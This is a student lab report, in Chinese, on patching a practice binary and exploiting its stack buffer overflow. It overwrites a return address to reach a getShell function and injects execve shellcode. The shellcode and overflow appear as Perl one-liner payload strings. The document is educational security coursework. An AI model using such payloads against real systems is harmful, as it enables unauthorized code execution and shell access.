zoukankan      html  css  js  c++  java
  • 20155209林虹宇逆向及Bof基础实验报告

    20155209林虹宇逆向及Bof基础实验报告

    实践目标

    • 本次实践的对象是一个名为pwn1的linux可执行文件。
    • 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
    • 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。

    三个实践内容如下:

    • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
    • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
    • 注入一个自己制作的shellcode并运行这段shellcode。

    这几种思路,基本代表现实情况中的攻击目标:

    • 运行原本不可访问的代码片段
    • 强行修改程序执行流
    • 以及注入运行任意代码。

    基础知识

    • 熟悉Linux基本操作,能看懂常用指令,如管道(|),输入、输出重定向(>)等。
    • 理解Bof的原理。能看得懂汇编、机器指令、EIP、指令地址。
    • 会使用gdb,vi。

    直接修改程序机器指令,改变程序执行流程

    • 知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
    • 学习目标:理解可执行文件与机器指令
    • 进阶:掌握ELF文件格式,掌握动态技术

    第一步

    • 反汇编,查看各函数调用的机器指令。
    • main函数调用foo,对应机器指令为“ e8 d7ffffff”,
      那我们想让它调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。
    • 用Windows计算器,直接 47d-4ba就能得到补码,是c3ffffff。

    第二步

    • 使用vi将指定内容修改。

    实验结果

    • 由于实验是在课上完成,只有完成截图。

    通过构造输入参数,造成BOF攻击,改变程序执行流

    第一步

    • 反汇编,发现该可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞;
    • 这里读入字符串,但系统只预留了__字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖想要实现的getshell的返回地址

    第二步

    • 确认输入字符串哪几个字符会覆盖到返回地址
    • 如果输入字符串1111111122222222333333334444444412345678,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。
    • getShell的内存地址,通过反汇编时可以看到,即0804847d。故要输入11111111222222223333333344444444x7dx84x04x08。

    第三步

    • 构造输入字符串
    • 使用Perl语言,然后使用输出重定向“>”将perl生成的字符串存储到文件input中。
    • perl -e 'print "11111111222222223333333344444444x7dx84x04x08x0a"' > input
    • 将input的输入,通过管道符“|”,作为pwn1的输入。

    实验结果

    注入Shellcode并执行

    第一步

    • 准备一段Shellcode,直接使用给好的shellcode。

    第二步

    • 修改些设置。
    • 直接输入老师给好的命令

    第三步

    • 构造要注入的payload

    • 开启两个终端,一个运行构造好的payload,一个进行gdb调试。

    • 我运行的这段代码。perl -e 'print "A" x 32;print "x20xd3xffxffx90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > input_shellcode

    • 所以gdb调试的终端中,要寻找20d3ffff。

    • 寻找如下

    • 所以地址是0xffffd3c0

    • 运行perl -e 'print "A" x 32;print "xc0xd3xffxffx90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > input_shellcode

    • 运行成功

  • 相关阅读:
    oracle重新学习,主要是命令实用,有借鉴其他人博客
    cdn缓存立刻刷新
    python3发送需要双向认证的wss请求
    【2021.08.03】平等交流
    【2021.07.31】正面回应才是面对挑战的最好方式
    【2021.07.28】向晚
    【2021.07.25】过个生日
    【2021.07.17】Asoul——那些无法杀死我的,终会使我变得更加强大
    phaser3微信小游戏2
    eve-ng 配置apache2的虚拟目录
  • 原文地址:https://www.cnblogs.com/lhyhahaha/p/8597132.html
Copyright © 2011-2022 走看看